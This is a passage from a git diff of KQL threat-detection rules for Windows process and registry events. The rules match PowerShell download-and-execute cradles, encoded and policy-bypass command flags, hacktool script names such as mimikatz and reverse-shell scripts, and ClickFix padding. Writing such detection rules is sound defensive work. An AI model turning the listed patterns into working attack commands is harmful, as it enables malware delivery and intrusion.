 | where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
index 55de894c..b732b260 100644
--- a/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
+++ b/KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-06-14
-// Level: high
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.persistence, attack.t1059
-
-DeviceProcessEvents
+// Title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-14
+// Level: high
+// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql b/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql
index 84cf0d77..73426311 100644
--- a/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql
+++ b/KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious PowerShell Download and Execute Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-28
-// Level: high
-// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Software installers that pull packages from remote systems and execute them
-
-DeviceProcessEvents
+// Title: Suspicious PowerShell Download and Execute Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-28
+// Level: high
+// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Software installers that pull packages from remote systems and execute them
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "IEX ((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX (New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX((New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains "IEX(New-Object Net.WebClient).DownloadString" or ProcessCommandLine contains " -command (New-Object System.Net.WebClient).DownloadFile(" or ProcessCommandLine contains " -c (New-Object System.Net.WebClient).DownloadFile("
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql b/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql
index 9fdde349..a820413c 100644
--- a/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql
+++ b/KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious PowerShell Encoded Command Patterns
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-05-24
-// Level: high
-// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Other tools that work with encoded scripts in the command line instead of script files
-
-DeviceProcessEvents
+// Title: Suspicious PowerShell Encoded Command Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-24
+// Level: high
+// Description: Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Other tools that work with encoded scripts in the command line instead of script files
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " PAA" or ProcessCommandLine contains " aQBlAHgA") and (ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll")))) and (not((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql b/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql
index 633a6128..75a1dcc8 100644
--- a/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql
+++ b/KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious PowerShell IEX Execution Patterns
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-03-24
-// Level: high
-// Description: Detects suspicious ways to run Invoke-Execution using IEX alias
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Legitimate scripts that use IEX
-
-DeviceProcessEvents
+// Title: Suspicious PowerShell IEX Execution Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-24
+// Level: high
+// Description: Detects suspicious ways to run Invoke-Execution using IEX alias
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate scripts that use IEX
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql b/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql
index 111b5f53..3c9d2594 100644
--- a/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql
+++ b/KQL/rules/Execution/suspicious_powershell_parameter_substring.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious PowerShell Parameter Substring
-// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
-// Date: 2019-01-16
-// Level: high
-// Description: Detects suspicious PowerShell invocation with a parameter substring
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-
-DeviceProcessEvents
+// Title: Suspicious PowerShell Parameter Substring
+// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
+// Date: 2019-01-16
+// Level: high
+// Description: Detects suspicious PowerShell invocation with a parameter substring
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv 
" or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " 
/NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_powershell_parent_process.kql b/KQL/rules/Execution/suspicious_powershell_parent_process.kql
index efd2aef9..f83f1038 100644
--- a/KQL/rules/Execution/suspicious_powershell_parent_process.kql
+++ b/KQL/rules/Execution/suspicious_powershell_parent_process.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious PowerShell Parent Process
-// Author: Teymur Kheirkhabarov, Harish Segar
-// Date: 2020-03-20
-// Level: high
-// Description: Detects a suspicious or uncommon parent processes of PowerShell
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.001
-// False Positives:
-// - Other scripts
-
-DeviceProcessEvents
+// Title: Suspicious PowerShell Parent Process
+// Author: Teymur Kheirkhabarov, Harish Segar
+// Date: 2020-03-20
+// Level: high
+// Description: Detects a suspicious or uncommon parent processes of PowerShell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+// - Other scripts
+
+DeviceProcessEvents
 | where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or 
InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql b/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql
index 327453f1..bb7f2743 100644
--- a/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql
+++ b/KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Process Created Via Wmic.EXE
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-10-12
-// Level: high
-// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1047
-
-DeviceProcessEvents
+// Title: Suspicious Process Created Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-12
+// Level: high
+// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ")
\ 
No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_program_names.kql b/KQL/rules/Execution/suspicious_program_names.kql
index 8682999e..7b2928ef 100644
--- a/KQL/rules/Execution/suspicious_program_names.kql
+++ b/KQL/rules/Execution/suspicious_program_names.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Program Names
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-11
-// Level: high
-// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Legitimate tools that accidentally match on the searched patterns
-
-DeviceProcessEvents
+// Title: Suspicious Program Names
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: high
+// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Legitimate tools that accidentally match on the searched patterns
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql b/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql
index 3b5c4ad0..ea0fa1fc 100644
--- a/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql
+++ b/KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Remote Child Process From Outlook
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018-12-27
-// Level: high
-// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
-
-DeviceProcessEvents
+// Title: Suspicious Remote Child Process From Outlook
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-12-27
+// Level: high
+// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
+
+DeviceProcessEvents
 | where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_runscripthelper_exe.kql b/KQL/rules/Execution/suspicious_runscripthelper_exe.kql
index 67f482ff..d4bcb169 100644
--- a/KQL/rules/Execution/suspicious_runscripthelper_exe.kql
+++ b/KQL/rules/Execution/suspicious_runscripthelper_exe.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Runscripthelper.exe
-// Author: Victor Sergeev, oscd.community
-// Date: 2020-10-09
-// Level: medium
-// Description: Detects execution of powershell scripts via Runscripthelper.exe
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
-
-DeviceProcessEvents
+// Title: Suspicious Runscripthelper.exe
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of powershell scripts via Runscripthelper.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_scan_loop_network.kql b/KQL/rules/Execution/suspicious_scan_loop_network.kql
index c077a6ca..909af7df 100644
--- a/KQL/rules/Execution/suspicious_scan_loop_network.kql
+++ b/KQL/rules/Execution/suspicious_scan_loop_network.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Scan Loop Network
-// Author: frack113
-// Date: 2022-03-12
-// Level: medium
-// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
-// False Positives:
-// - Legitimate script
-
-DeviceProcessEvents
+// Title: Suspicious Scan Loop Network
+// Author: frack113
+// Date: 2022-03-12
+// Level: medium
+// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
+// False Positives:
+// - Legitimate script
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql b/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql
index c7016d0b..afe5bb3a 100644
--- a/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql
+++ b/KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Script Execution From Temp Folder
-// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
-// Date: 2021-07-14
-// Level: high
-// Description: Detects a suspicious script executions from temporary folder
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-// False Positives:
-// - Administrative scripts
-
-DeviceProcessEvents
+// Title: Suspicious Script Execution From Temp Folder
+// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton
+// Date: 2021-07-14
+// Level: high
+// Description: Detects a suspicious script executions from temporary folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Administrative scripts
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\")))
\ No newline at end of file
diff --git a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
index ed803c53..bcf322f4 100644
--- a/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
+++ b/KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
@@ -1,12 +1,12 @@ -// Title: Suspicious Space Characters in RunMRU Registry Path - ClickFix -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-11-04 -// Level: high -// Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Suspicious Space Characters in RunMRU Registry Path - ClickFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ") \ No newline at end of file 
diff --git a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
index 0665c764..0800c15e 100644
--- a/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
+++ b/KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
@@ -1,12 +1,12 @@ -// Title: Suspicious Space Characters in TypedPaths Registry Path - FileFix -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-11-04 -// Level: high -// Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Suspicious Space Characters in TypedPaths Registry Path - FileFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or 